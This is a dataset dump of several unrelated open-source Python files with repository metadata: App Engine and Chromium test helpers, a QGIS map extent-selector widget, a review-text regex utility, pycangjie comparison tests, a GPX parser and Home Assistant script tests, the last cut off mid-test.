| text (stringlengths 6-947k) | repo_name (stringlengths 5-100) | path (stringlengths 4-231) | language (stringclasses 1 value) | license (stringclasses 15 values) | size (int64 6-947k) | score (float64 0-0.34) |
|---|---|---|---|---|---|---|
# Copyright 2015 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
# Import py.test hooks and fixtures for App Engine
from gcp.testing.appengine import (
login,
pytest_configure,
pytest_runtest_call,
run_tasks,
testbed)
import six
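# Re-reference the imported fixtures so linters don't flag them as unused;
# pytest still discovers and applies them by name.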
(login)
(pytest_configure)
(pytest_runtest_call)
(run_tasks)
(testbed)
def pytest_ignore_collect(path, config):
"""Skip App Engine tests in python 3 or if no SDK is available."""
if 'appengine/standard' in str(path):
if six.PY3:
return True
if 'GAE_SDK_PATH' not in os.environ:
return True
return False
| pongem/python-bot-project | appengine/standard/conftest.py | Python | apache-2.0 | 1,150 | 0 |
#!/usr/bin/env python
# Copyright 2018 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import unpack_pak
import unittest
class UnpackPakTest(unittest.TestCase):
def testMapFileLine(self):
self.assertTrue(unpack_pak.ParseLine(' {"path.js", IDR_PATH}'))
def testGzippedMapFileLine(self):
self.assertTrue(unpack_pak.ParseLine(' {"path.js", IDR_PATH, false}'))
self.assertTrue(unpack_pak.ParseLine(' {"path.js", IDR_PATH, true}'))
def testGetFileAndDirName(self):
(f, d) = unpack_pak.GetFileAndDirName(
'out/build/gen/foo/foo.unpak', 'out/build/gen/foo', 'a/b.js')
self.assertEquals('b.js', f)
self.assertEquals('out/build/gen/foo/foo.unpak/a', d)
def testGetFileAndDirNameForGeneratedResource(self):
(f, d) = unpack_pak.GetFileAndDirName(
'out/build/gen/foo/foo.unpak', 'out/build/gen/foo',
'@out_folder@/out/build/gen/foo/a/b.js')
self.assertEquals('b.js', f)
self.assertEquals('out/build/gen/foo/foo.unpak/a', d)
if __name__ == '__main__':
unittest.main()
| endlessm/chromium-browser | chrome/browser/resources/unpack_pak_test.py | Python | bsd-3-clause | 1,132 | 0.0053 |
# -*- coding: utf-8 -*-
"""
***************************************************************************
extentSelector.py
---------------------
Date : December 2010
Copyright : (C) 2010 by Giuseppe Sucameli
Email : brush dot tyler at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Giuseppe Sucameli'
__date__ = 'December 2010'
__copyright__ = '(C) 2010, Giuseppe Sucameli'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
from PyQt4.QtCore import *
from PyQt4.QtGui import *
from qgis.core import *
from qgis.gui import *
from ui_extentSelector import Ui_GdalToolsExtentSelector as Ui_ExtentSelector
import GdalTools_utils as Utils
class GdalToolsExtentSelector(QWidget, Ui_ExtentSelector):
def __init__(self, parent=None):
QWidget.__init__(self, parent)
self.canvas = None
self.tool = None
self.previousMapTool = None
self.isStarted = False
self.setupUi(self)
self.connect(self.x1CoordEdit, SIGNAL("textChanged(const QString &)"), self.coordsChanged)
self.connect(self.x2CoordEdit, SIGNAL("textChanged(const QString &)"), self.coordsChanged)
self.connect(self.y1CoordEdit, SIGNAL("textChanged(const QString &)"), self.coordsChanged)
self.connect(self.y2CoordEdit, SIGNAL("textChanged(const QString &)"), self.coordsChanged)
self.connect(self.btnEnable, SIGNAL("clicked()"), self.start)
def setCanvas(self, canvas):
self.canvas = canvas
self.tool = RectangleMapTool(self.canvas)
self.previousMapTool = self.canvas.mapTool()
self.connect(self.tool, SIGNAL("rectangleCreated()"), self.fillCoords)
self.connect(self.tool, SIGNAL("deactivated()"), self.pause)
def stop(self):
if not self.isStarted:
return
self.isStarted = False
self.btnEnable.setVisible(False)
self.tool.reset()
self.canvas.unsetMapTool(self.tool)
if self.previousMapTool != self.tool:
self.canvas.setMapTool(self.previousMapTool)
#self.coordsChanged()
self.emit( SIGNAL( "selectionStopped()" ) )
def start(self):
prevMapTool = self.canvas.mapTool()
if prevMapTool != self.tool:
self.previousMapTool = prevMapTool
self.canvas.setMapTool(self.tool)
self.isStarted = True
self.btnEnable.setVisible(False)
self.coordsChanged()
self.emit( SIGNAL( "selectionStarted()" ) )
def pause(self):
if not self.isStarted:
return
self.btnEnable.setVisible(True)
self.emit( SIGNAL( "selectionPaused()" ) )
def setExtent(self, rect):
if self.tool.setRectangle(rect):
self.emit( SIGNAL( "newExtentDefined()" ) )
def getExtent(self):
return self.tool.rectangle()
def isCoordsValid(self):
try:
point1 = QgsPoint( float(self.x1CoordEdit.text()), float(self.y1CoordEdit.text()) )
point2 = QgsPoint( float(self.x2CoordEdit.text()), float(self.y2CoordEdit.text()) )
except ValueError:
return False
return True
def coordsChanged(self):
rect = None
if self.isCoordsValid():
point1 = QgsPoint( float(self.x1CoordEdit.text()), float(self.y1CoordEdit.text()) )
point2 = QgsPoint( float(self.x2CoordEdit.text()), float(self.y2CoordEdit.text()) )
rect = QgsRectangle(point1, point2)
self.setExtent(rect)
def fillCoords(self):
rect = self.getExtent()
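# Temporarily block this widget's own signals so intermediate notifications are
# suppressed while the edits are filled; newExtentDefined() is emitted once below.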
self.blockSignals(True)
if rect != None:
self.x1CoordEdit.setText( str(rect.xMinimum()) )
self.x2CoordEdit.setText( str(rect.xMaximum()) )
self.y1CoordEdit.setText( str(rect.yMaximum()) )
self.y2CoordEdit.setText( str(rect.yMinimum()) )
else:
self.x1CoordEdit.clear()
self.x2CoordEdit.clear()
self.y1CoordEdit.clear()
self.y2CoordEdit.clear()
self.blockSignals(False)
self.emit( SIGNAL( "newExtentDefined()" ) )
class RectangleMapTool(QgsMapToolEmitPoint):
def __init__(self, canvas):
self.canvas = canvas
QgsMapToolEmitPoint.__init__(self, self.canvas)
self.rubberBand = QgsRubberBand( self.canvas, True ) # true, it's a polygon
self.rubberBand.setColor( Qt.red )
self.rubberBand.setWidth( 1 )
self.reset()
def reset(self):
self.startPoint = self.endPoint = None
self.isEmittingPoint = False
self.rubberBand.reset( True ) # true, it's a polygon
def canvasPressEvent(self, e):
self.startPoint = self.toMapCoordinates( e.pos() )
self.endPoint = self.startPoint
self.isEmittingPoint = True
self.showRect(self.startPoint, self.endPoint)
def canvasReleaseEvent(self, e):
self.isEmittingPoint = False
if self.rectangle() != None:
self.emit( SIGNAL("rectangleCreated()") )
def canvasMoveEvent(self, e):
if not self.isEmittingPoint:
return
self.endPoint = self.toMapCoordinates( e.pos() )
self.showRect(self.startPoint, self.endPoint)
def showRect(self, startPoint, endPoint):
self.rubberBand.reset( True ) # true, it's a polygon
if startPoint.x() == endPoint.x() or startPoint.y() == endPoint.y():
return
point1 = QgsPoint(startPoint.x(), startPoint.y())
point2 = QgsPoint(startPoint.x(), endPoint.y())
point3 = QgsPoint(endPoint.x(), endPoint.y())
point4 = QgsPoint(endPoint.x(), startPoint.y())
self.rubberBand.addPoint( point1, False )
self.rubberBand.addPoint( point2, False )
self.rubberBand.addPoint( point3, False )
self.rubberBand.addPoint( point4, True ) # true to update canvas
self.rubberBand.show()
def rectangle(self):
if self.startPoint == None or self.endPoint == None:
return None
elif self.startPoint.x() == self.endPoint.x() or self.startPoint.y() == self.endPoint.y():
return None
return QgsRectangle(self.startPoint, self.endPoint)
def setRectangle(self, rect):
if rect == self.rectangle():
return False
if rect == None:
self.reset()
else:
self.startPoint = QgsPoint(rect.xMaximum(), rect.yMaximum())
self.endPoint = QgsPoint(rect.xMinimum(), rect.yMinimum())
self.showRect(self.startPoint, self.endPoint)
return True
def deactivate(self):
QgsMapTool.deactivate(self)
self.emit(SIGNAL("deactivated()"))
| bstroebl/QGIS | python/plugins/GdalTools/tools/extentSelector.py | Python | gpl-2.0 | 7,022 | 0.026915 |
import re
class rgxHandler:
# Taken from https://www.safaribooksonline.com/library/view/python-cookbook-2nd/0596007973/ch01s19.html
linetitles = ["product/productId: ", "product/title: ", "product/price: ", "review/userId: ", "review/profileName: ", "review/helpfulness: ", "review/score: ", "review/time: ", "review/summary: ", "review/text: "]
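# Map every field prefix to '' so multiple_replace() strips them all in one pass.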
getrids = dict([(linetitles[0],''), (linetitles[1],''), (linetitles[2],''), (linetitles[3],''), (linetitles[4],''), (linetitles[5],''), (linetitles[6],''), (linetitles[7],''), (linetitles[8],''), (linetitles[9],'')])
replace = {"\\":"\\\\", '"':"&quot;" }
unreplace = {"\\\\":"\\", "&quot;":'"'}
def __init__(self):
pass
def multiple_replace(self, text, adict):
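# Cookbook recipe: build one regex that alternates over every key, then
# substitute each match with its value via a dict lookup.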
rx = re.compile('|'.join(map(re.escape, adict)))
def one_xlat(match):
return adict[match.group(0)]
return rx.sub(one_xlat, text)
def line_rgx(self, text):
text = text.strip('\n')
text = self.multiple_replace(text, self.getrids)
text = self.multiple_replace(text, self.replace)
return text
def find3OrMore(self, line):
#line = re.sub("&quot;", ' ', line)
line = re.sub(r'([^\s\w]|_)+', ' ', line)
words = line.split()
rtnwords = []
for word in words:
if len(word.strip()) >= 3:
rtnwords.append(word.strip().lower())
return rtnwords
def putLineTitlesBack(self, review):
rtnlines = []
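# Locate every quote and comma so the single CSV-style review string can be
# split back into its original field lines.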
iter = re.finditer('"', review)
quotes = [m.start(0) for m in iter]
iter = re.finditer(',', review)
commas = [m.start(0) for m in iter]
q = 0
c = 0
i = 0
while(True):
#print(str(i))
#print("c: " + str(c) + "/" + str(len(commas)) + " " + str(commas[c]))
#print("q: " + str(q) + "/" + str(len(quotes)) + " " + str(quotes[q]))
if commas[c] < quotes[q] and ((c+1) < len(commas)):
if c == 0:
#print(review[0:commas[c]] + '\n')
rtnlines.append(review[0:commas[c]] + '\n')
else:
if quotes[q-1] > commas[c-1]:
pass
else:
#print(review[commas[c-1]+1:commas[c]] + '\n')
rtnlines.append(review[commas[c-1]+1:commas[c]] + '\n')
c += 1
elif (commas[c] > quotes[q] and commas[c] < quotes[q+1]) or ((c+1) == len(commas)):
#print(review[quotes[q]+1:quotes[q+1]] + '\n')
rtnlines.append(review[quotes[q]+1:quotes[q+1]] + '\n')
if q+1 == len(quotes)-1:
break
while commas[c] < quotes[q+1]:
c += 1
q+=2
else:
#print(review[quotes[q]+1:quotes[q+1]] + '\n')
rtnlines.append(review[quotes[q]+1:quotes[q+1]] + '\n')
q+=2
if q == len(quotes):
break
i += 1
i = 0
for line in rtnlines:
line = self.multiple_replace(line.strip('"'), self.unreplace)
rtnlines[i] = self.linetitles[i] + line + '\n'
i += 1
return rtnlines
| quentinlautischer/291MiniProject2 | src/rgxHandler.py | Python | apache-2.0 | 3,349 | 0.01284 |
#!/Users/patron/Desktop/maps/django-project/bin/python
from django.core import management
if __name__ == "__main__":
management.execute_from_command_line()
| abzaloid/maps | django-project/bin/django-admin.py | Python | mit | 161 | 0 |
# Copyright (c) 2013 - The pycangjie authors
#
# This file is part of pycangjie, the Python bindings to libcangjie.
#
# pycangjie is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# pycangjie is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with pycangjie. If not, see <http://www.gnu.org/licenses/>.
import itertools
import operator
import string
import subprocess
import unittest
import cangjie
class MetaTest(type):
"""Metaclass for our test cases
The goal is to provide every TestCase class with methods like test_a(),
test_b(), etc..., in other words, one method per potential Cangjie input
code.
Well, not quite, because that would be 12356630 methods (the number of
strings composed of 1 to 5 lowercase ascii letters), and even though my
laptop has 8 GB of RAM, the test process gets killed by the OOM killer. :)
So we cheat, and use libcangjie's wildcard support, so that we only
generate 26 + 26^2 = 702 methods.
"""
def __init__(cls, name, bases, dct):
super(MetaTest, cls).__init__(name, bases, dct)
def gen_codes():
"""Generate the 702 possible input codes"""
# First, the 1-character codes
for c in string.ascii_lowercase:
yield c
# Next, the 2-characters-with-wildcard codes
for t in itertools.product(string.ascii_lowercase, repeat=2):
yield '*'.join(t)
def tester(code):
def func(cls):
return cls.run_test(code)
return func
# Generate the test_* methods
for code in gen_codes():
setattr(cls, "test_%s" % code.replace("*", ""), tester(code))
class BaseTestCase(unittest.TestCase):
"""Base test class, grouping the common stuff for all our unit tests"""
def __init__(self, name):
super().__init__(name)
self.cli_cmd = ["/usr/bin/libcangjie_cli"] + self.cli_options
self.language = (cangjie.filters.BIG5 | cangjie.filters.HKSCS |
cangjie.filters.PUNCTUATION |
cangjie.filters.CHINESE |
cangjie.filters.ZHUYIN | cangjie.filters.KANJI |
cangjie.filters.KATAKANA |
cangjie.filters.HIRAGANA |
cangjie.filters.SYMBOLS)
def setUp(self):
self.cj = cangjie.Cangjie(self.version, self.language)
def tearDown(self):
del self.cj
def run_command(self, cmd):
"""Run a command, deal with errors, and return its stdout"""
proc = subprocess.Popen(cmd, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
out, err = proc.communicate()
try:
cangjie.errors.handle_error_code(proc.returncode,
msg="Unknown error while running"
" libcangjie_cli (%d)"
% proc.returncode)
except cangjie.errors.CangjieNoCharsError:
return ""
try:
return out.decode("utf-8")
except UnicodeDecodeError:
# Python's 'utf-8' codec trips over b"\xed\xa1\x9d\xed\xbc\xb2",
# but according to [1] and [2], it is a valid sequence of 2 chars:
# U+D85D \xed\xa1\x9d
# U+DF32 \xed\xbc\xb2
# [1] http://www.utf8-chartable.de/unicode-utf8-table.pl?start=55389&utf8=string-literal
# [2] http://www.utf8-chartable.de/unicode-utf8-table.pl?start=57138&utf8=string-literal
# TODO: Investigate this further, and eventually open a bug report
out2 = []
for line in out.split("\n".encode("utf-8")):
try:
out2.append(line.decode("utf-8"))
except UnicodeDecodeError:
pass
return "\n".join(out2)
def run_test(self, input_code):
"""Run the actual test
This compares the output of the libcangjie_cli tool with the output
from pycangjie.
The idea is that if pycangjie produces the same results as a C++ tool
compiled against libcangjie, then pycangjie properly wraps libcangjie.
We do not try to verify that pycangjie produces valid results here,
validity is to be checked in libcangjie.
Note that this whole test is based on scraping the output of
libcangjie_cli, which is quite fragile.
"""
# Get a list of CangjieChar from libcangjie_cli as a reference
tmp_expected = self.run_command(self.cli_cmd+[input_code]).split("\n")
tmp_expected = map(lambda x: x.strip(" \n"), tmp_expected)
tmp_expected = filter(lambda x: len(x) > 0, tmp_expected)
expected = []
for item in tmp_expected:
chchar, simpchar, code, frequency = item.split(", ")
chchar = chchar.split(": ")[-1].strip("'")
simpchar = simpchar.split(": ")[-1].strip("'")
code = code.split(": ")[-1].strip("'")
frequency = int(frequency.split(" ")[-1])
expected.append(cangjie._core.CangjieChar(chchar.encode("utf-8"),
simpchar.encode("utf-8"),
code.encode("utf-8"),
frequency))
expected = sorted(expected, key=operator.attrgetter('chchar', 'code'))
try:
# And compare with what pycangjie produces
results = sorted(self.cj.get_characters(input_code),
key=operator.attrgetter('chchar', 'code'))
self.assertEqual(results, expected)
except cangjie.errors.CangjieNoCharsError:
self.assertEqual(len(expected), 0)
| Cangjians/pycangjie | tests/__init__.py | Python | lgpl-3.0 | 6,379 | 0.000314 |
#!/usr/bin/env python
# -*- coding: utf8 -*-
import xml.etree.ElementTree as ET
from pprint import pprint
filename = 'GeoLogger.gpx'
def main():
tree = ET.parse(filename)
root = tree.getroot()
pprint(root.tag)
pprint(root.attrib)
pprint(root.findtext('.'))
if __name__ == "__main__":
main()
| TheShellLand/pies | v3/Libraries/xml/xml-parse.py | Python | mit | 321 | 0 |
"""The tests for the Script component."""
# pylint: disable=protected-access
import asyncio
from contextlib import contextmanager
from datetime import timedelta
import logging
from unittest import mock
import pytest
import voluptuous as vol
# Otherwise can't test just this file (import order issue)
from homeassistant import exceptions
import homeassistant.components.scene as scene
from homeassistant.const import ATTR_ENTITY_ID, SERVICE_TURN_ON
from homeassistant.core import Context, CoreState, callback
from homeassistant.helpers import config_validation as cv, script
from homeassistant.helpers.event import async_call_later
import homeassistant.util.dt as dt_util
from tests.async_mock import patch
from tests.common import (
async_capture_events,
async_fire_time_changed,
async_mock_service,
)
ENTITY_ID = "script.test"
@pytest.fixture
def mock_timeout(hass, monkeypatch):
"""Mock async_timeout.timeout."""
class MockTimeout:
def __init__(self, timeout):
self._timeout = timeout
self._loop = asyncio.get_event_loop()
self._task = None
self._cancelled = False
self._unsub = None
async def __aenter__(self):
if self._timeout is None:
return self
self._task = asyncio.Task.current_task()
if self._timeout <= 0:
self._loop.call_soon(self._cancel_task)
return self
# Wait for a time_changed event instead of real time passing.
self._unsub = async_call_later(hass, self._timeout, self._cancel_task)
return self
async def __aexit__(self, exc_type, exc_val, exc_tb):
if exc_type is asyncio.CancelledError and self._cancelled:
self._unsub = None
self._task = None
raise asyncio.TimeoutError
if self._timeout is not None and self._unsub:
self._unsub()
self._unsub = None
self._task = None
return None
@callback
def _cancel_task(self, now=None):
if self._task is not None:
self._task.cancel()
self._cancelled = True
monkeypatch.setattr(script, "timeout", MockTimeout)
def async_watch_for_action(script_obj, message):
"""Watch for message in last_action."""
flag = asyncio.Event()
@callback
def check_action():
if script_obj.last_action and message in script_obj.last_action:
flag.set()
script_obj.change_listener = check_action
return flag
async def test_firing_event_basic(hass):
"""Test the firing of events."""
event = "test_event"
context = Context()
events = async_capture_events(hass, event)
sequence = cv.SCRIPT_SCHEMA({"event": event, "event_data": {"hello": "world"}})
script_obj = script.Script(hass, sequence)
await script_obj.async_run(context=context)
await hass.async_block_till_done()
assert len(events) == 1
assert events[0].context is context
assert events[0].data.get("hello") == "world"
async def test_firing_event_template(hass):
"""Test the firing of events."""
event = "test_event"
context = Context()
events = async_capture_events(hass, event)
sequence = cv.SCRIPT_SCHEMA(
{
"event": event,
"event_data_template": {
"dict": {
1: "{{ is_world }}",
2: "{{ is_world }}{{ is_world }}",
3: "{{ is_world }}{{ is_world }}{{ is_world }}",
},
"list": ["{{ is_world }}", "{{ is_world }}{{ is_world }}"],
},
}
)
script_obj = script.Script(hass, sequence)
await script_obj.async_run({"is_world": "yes"}, context=context)
await hass.async_block_till_done()
assert len(events) == 1
assert events[0].context is context
assert events[0].data == {
"dict": {1: "yes", 2: "yesyes", 3: "yesyesyes"},
"list": ["yes", "yesyes"],
}
async def test_calling_service_basic(hass):
"""Test the calling of a service."""
context = Context()
calls = async_mock_service(hass, "test", "script")
sequence = cv.SCRIPT_SCHEMA({"service": "test.script", "data": {"hello": "world"}})
script_obj = script.Script(hass, sequence)
await script_obj.async_run(context=context)
await hass.async_block_till_done()
assert len(calls) == 1
assert calls[0].context is context
assert calls[0].data.get("hello") == "world"
async def test_calling_service_template(hass):
"""Test the calling of a service."""
context = Context()
calls = async_mock_service(hass, "test", "script")
sequence = cv.SCRIPT_SCHEMA(
{
"service_template": """
{% if True %}
test.script
{% else %}
test.not_script
{% endif %}""",
"data_template": {
"hello": """
{% if is_world == 'yes' %}
world
{% else %}
not world
{% endif %}
"""
},
}
)
script_obj = script.Script(hass, sequence)
await script_obj.async_run({"is_world": "yes"}, context=context)
await hass.async_block_till_done()
assert len(calls) == 1
assert calls[0].context is context
assert calls[0].data.get("hello") == "world"
async def test_multiple_runs_no_wait(hass):
"""Test multiple runs with no wait in script."""
logger = logging.getLogger("TEST")
calls = []
heard_event = asyncio.Event()
async def async_simulate_long_service(service):
"""Simulate a service that takes a not insignificant time."""
fire = service.data.get("fire")
listen = service.data.get("listen")
service_done = asyncio.Event()
@callback
def service_done_cb(event):
logger.debug("simulated service (%s:%s) done", fire, listen)
service_done.set()
calls.append(service)
logger.debug("simulated service (%s:%s) started", fire, listen)
unsub = hass.bus.async_listen(listen, service_done_cb)
hass.bus.async_fire(fire)
await service_done.wait()
unsub()
hass.services.async_register("test", "script", async_simulate_long_service)
@callback
def heard_event_cb(event):
logger.debug("heard: %s", event)
heard_event.set()
sequence = cv.SCRIPT_SCHEMA(
[
{
"service": "test.script",
"data_template": {"fire": "{{ fire1 }}", "listen": "{{ listen1 }}"},
},
{
"service": "test.script",
"data_template": {"fire": "{{ fire2 }}", "listen": "{{ listen2 }}"},
},
]
)
script_obj = script.Script(hass, sequence, script_mode="parallel", max_runs=2)
# Start script twice in such a way that second run will be started while first run
# is in the middle of the first service call.
unsub = hass.bus.async_listen("1", heard_event_cb)
logger.debug("starting 1st script")
hass.async_create_task(
script_obj.async_run(
{"fire1": "1", "listen1": "2", "fire2": "3", "listen2": "4"}
)
)
await asyncio.wait_for(heard_event.wait(), 1)
unsub()
logger.debug("starting 2nd script")
await script_obj.async_run(
{"fire1": "2", "listen1": "3", "fire2": "4", "listen2": "4"}
)
await hass.async_block_till_done()
assert len(calls) == 4
async def test_activating_scene(hass):
"""Test the activation of a scene."""
context = Context()
calls = async_mock_service(hass, scene.DOMAIN, SERVICE_TURN_ON)
sequence = cv.SCRIPT_SCHEMA({"scene": "scene.hello"})
script_obj = script.Script(hass, sequence)
await script_obj.async_run(context=context)
await hass.async_block_till_done()
assert len(calls) == 1
assert calls[0].context is context
assert calls[0].data.get(ATTR_ENTITY_ID) == "scene.hello"
@pytest.mark.parametrize("count", [1, 3])
async def test_stop_no_wait(hass, count):
"""Test stopping script."""
service_started_sem = asyncio.Semaphore(0)
finish_service_event = asyncio.Event()
event = "test_event"
events = async_capture_events(hass, event)
async def async_simulate_long_service(service):
"""Simulate a service that takes a not insignificant time."""
service_started_sem.release()
await finish_service_event.wait()
hass.services.async_register("test", "script", async_simulate_long_service)
sequence = cv.SCRIPT_SCHEMA([{"service": "test.script"}, {"event": event}])
script_obj = script.Script(hass, sequence, script_mode="parallel", max_runs=count)
# Get script started specified number of times and wait until the test.script
# service has started for each run.
tasks = []
for _ in range(count):
hass.async_create_task(script_obj.async_run())
tasks.append(hass.async_create_task(service_started_sem.acquire()))
await asyncio.wait_for(asyncio.gather(*tasks), 1)
# Can't assert just yet because we haven't verified stopping works yet.
# If assert fails we can hang test if async_stop doesn't work.
script_was_running = script_obj.is_running
were_no_events = len(events) == 0
# Begin the process of stopping the script (which should stop all runs), and then
# let the service calls complete.
hass.async_create_task(script_obj.async_stop())
finish_service_event.set()
await hass.async_block_till_done()
assert script_was_running
assert were_no_events
assert not script_obj.is_running
assert len(events) == 0
async def test_delay_basic(hass, mock_timeout):
"""Test the delay."""
delay_alias = "delay step"
sequence = cv.SCRIPT_SCHEMA({"delay": {"seconds": 5}, "alias": delay_alias})
script_obj = script.Script(hass, sequence)
delay_started_flag = async_watch_for_action(script_obj, delay_alias)
try:
hass.async_create_task(script_obj.async_run())
await asyncio.wait_for(delay_started_flag.wait(), 1)
assert script_obj.is_running
assert script_obj.last_action == delay_alias
except (AssertionError, asyncio.TimeoutError):
await script_obj.async_stop()
raise
else:
async_fire_time_changed(hass, dt_util.utcnow() + timedelta(seconds=5))
await hass.async_block_till_done()
assert not script_obj.is_running
assert script_obj.last_action is None
async def test_multiple_runs_delay(hass, mock_timeout):
"""Test multiple runs with delay in script."""
event = "test_event"
events = async_capture_events(hass, event)
delay = timedelta(seconds=5)
sequence = cv.SCRIPT_SCHEMA(
[
{"event": event, "event_data": {"value": 1}},
{"delay": delay},
{"event": event, "event_data": {"value": 2}},
]
)
script_obj = script.Script(hass, sequence, script_mode="parallel", max_runs=2)
delay_started_flag = async_watch_for_action(script_obj, "delay")
try:
hass.async_create_task(script_obj.async_run())
await asyncio.wait_for(delay_started_flag.wait(), 1)
assert script_obj.is_running
assert len(events) == 1
assert events[-1].data["value"] == 1
except (AssertionError, asyncio.TimeoutError):
await script_obj.async_stop()
raise
else:
# Start second run of script while first run is in a delay.
script_obj.sequence[1]["alias"] = "delay run 2"
delay_started_flag = async_watch_for_action(script_obj, "delay run 2")
hass.async_create_task(script_obj.async_run())
await asyncio.wait_for(delay_started_flag.wait(), 1)
async_fire_time_changed(hass, dt_util.utcnow() + delay)
await hass.async_block_till_done()
assert not script_obj.is_running
assert len(events) == 4
assert events[-3].data["value"] == 1
assert events[-2].data["value"] == 2
assert events[-1].data["value"] == 2
async def test_delay_template_ok(hass, mock_timeout):
"""Test the delay as a template."""
sequence = cv.SCRIPT_SCHEMA({"delay": "00:00:{{ 5 }}"})
script_obj = script.Script(hass, sequence)
delay_started_flag = async_watch_for_action(script_obj, "delay")
try:
hass.async_create_task(script_obj.async_run())
await asyncio.wait_for(delay_started_flag.wait(), 1)
assert script_obj.is_running
except (AssertionError, asyncio.TimeoutError):
await script_obj.async_stop()
raise
else:
async_fire_time_changed(hass, dt_util.utcnow() + timedelta(seconds=5))
await hass.async_block_till_done()
assert not script_obj.is_running
async def test_delay_template_invalid(hass, caplog):
"""Test the delay as a template that fails."""
event = "test_event"
events = async_capture_events(hass, event)
sequence = cv.SCRIPT_SCHEMA(
[
{"event": event},
{"delay": "{{ invalid_delay }}"},
{"delay": {"seconds": 5}},
{"event": event},
]
)
script_obj = script.Script(hass, sequence)
start_idx = len(caplog.records)
await script_obj.async_run()
await hass.async_block_till_done()
assert any(
rec.levelname == "ERROR" and "Error rendering" in rec.message
for rec in caplog.records[start_idx:]
)
assert not script_obj.is_running
assert len(events) == 1
async def test_delay_template_complex_ok(hass, mock_timeout):
"""Test the delay with a working complex template."""
sequence = cv.SCRIPT_SCHEMA({"delay": {"seconds": "{{ 5 }}"}})
script_obj = script.Script(hass, sequence)
delay_started_flag = async_watch_for_action(script_obj, "delay")
try:
hass.async_create_task(script_obj.async_run())
await asyncio.wait_for(delay_started_flag.wait(), 1)
assert script_obj.is_running
except (AssertionError, asyncio.TimeoutError):
await script_obj.async_stop()
raise
else:
async_fire_time_changed(hass, dt_util.utcnow() + timedelta(seconds=5))
await hass.async_block_till_done()
assert not script_obj.is_running
async def test_delay_template_complex_invalid(hass, caplog):
"""Test the delay with a complex template that fails."""
event = "test_event"
events = async_capture_events(hass, event)
sequence = cv.SCRIPT_SCHEMA(
[
{"event": event},
{"delay": {"seconds": "{{ invalid_delay }}"}},
{"delay": {"seconds": 5}},
{"event": event},
]
)
script_obj = script.Script(hass, sequence)
start_idx = len(caplog.records)
await script_obj.async_run()
await hass.async_block_till_done()
assert any(
rec.levelname == "ERROR" and "Error rendering" in rec.message
for rec in caplog.records[start_idx:]
)
assert not script_obj.is_running
assert len(events) == 1
async def test_cancel_delay(hass):
"""Test the cancelling while the delay is present."""
event = "test_event"
events = async_capture_events(hass, event)
sequence = cv.SCRIPT_SCHEMA([{"delay": {"seconds": 5}}, {"event": event}])
script_obj = script.Script(hass, sequence)
delay_started_flag = async_watch_for_action(script_obj, "delay")
try:
hass.async_create_task(script_obj.async_run())
await asyncio.wait_for(delay_started_flag.wait(), 1)
assert script_obj.is_running
assert len(events) == 0
except (AssertionError, asyncio.TimeoutError):
await script_obj.async_stop()
raise
else:
await script_obj.async_stop()
assert not script_obj.is_running
# Make sure the script is really stopped.
async_fire_time_changed(hass, dt_util.utcnow() + timedelta(seconds=5))
await hass.async_block_till_done()
assert not script_obj.is_running
assert len(events) == 0
async def test_wait_template_basic(hass):
"""Test the wait template."""
wait_alias = "wait step"
sequence = cv.SCRIPT_SCHEMA(
{
"wait_template": "{{ states.switch.test.state == 'off' }}",
"alias": wait_alias,
}
)
script_obj = script.Script(hass, sequence)
wait_started_flag = async_watch_for_action(script_obj, wait_alias)
try:
hass.states.async_set("switch.test", "on")
hass.async_create_task(script_obj.async_run())
await asyncio.wait_for(wait_started_flag.wait(), 1)
assert script_obj.is_running
assert script_obj.last_action == wait_alias
except (AssertionError, asyncio.TimeoutError):
await script_obj.async_stop()
raise
else:
hass.states.async_set("switch.test", "off")
await hass.async_block_till_done()
assert not script_obj.is_running
assert script_obj.last_action is None
async def test_multiple_runs_wait_template(hass):
"""Test multiple runs with wait_template in script."""
event = "test_event"
events = async_capture_events(hass, event)
sequence = cv.SCRIPT_SCHEMA(
[
{"event": event, "event_data": {"value": 1}},
{"wait_template": "{{ states.switch.test.state == 'off' }}"},
{"event": event, "event_data": {"value": 2}},
]
)
script_obj = script.Script(hass, sequence, script_mode="parallel", max_runs=2)
wait_started_flag = async_watch_for_action(script_obj, "wait")
try:
hass.states.async_set("switch.test", "on")
hass.async_create_task(script_obj.async_run())
await asyncio.wait_for(wait_started_flag.wait(), 1)
assert script_obj.is_running
assert len(events) == 1
assert events[-1].data["value"] == 1
except (AssertionError, asyncio.TimeoutError):
await script_obj.async_stop()
raise
else:
# Start second run of script while first run is in wait_template.
hass.async_create_task(script_obj.async_run())
hass.states.async_set("switch.test", "off")
await hass.async_block_till_done()
assert not script_obj.is_running
assert len(events) == 4
assert events[-3].data["value"] == 1
assert events[-2].data["value"] == 2
assert events[-1].data["value"] == 2
async def test_cancel_wait_template(hass):
"""Test the cancelling while wait_template is present."""
event = "test_event"
events = async_capture_events(hass, event)
sequence = cv.SCRIPT_SCHEMA(
[
{"wait_template": "{{ states.switch.test.state == 'off' }}"},
{"event": event},
]
)
script_obj = script.Script(hass, sequence)
wait_started_flag = async_watch_for_action(script_obj, "wait")
try:
hass.states.async_set("switch.test", "on")
hass.async_create_task(script_obj.async_run())
await asyncio.wait_for(wait_started_flag.wait(), 1)
assert script_obj.is_running
assert len(events) == 0
except (AssertionError, asyncio.TimeoutError):
await script_obj.async_stop()
raise
else:
await script_obj.async_stop()
assert not script_obj.is_running
# Make sure the script is really stopped.
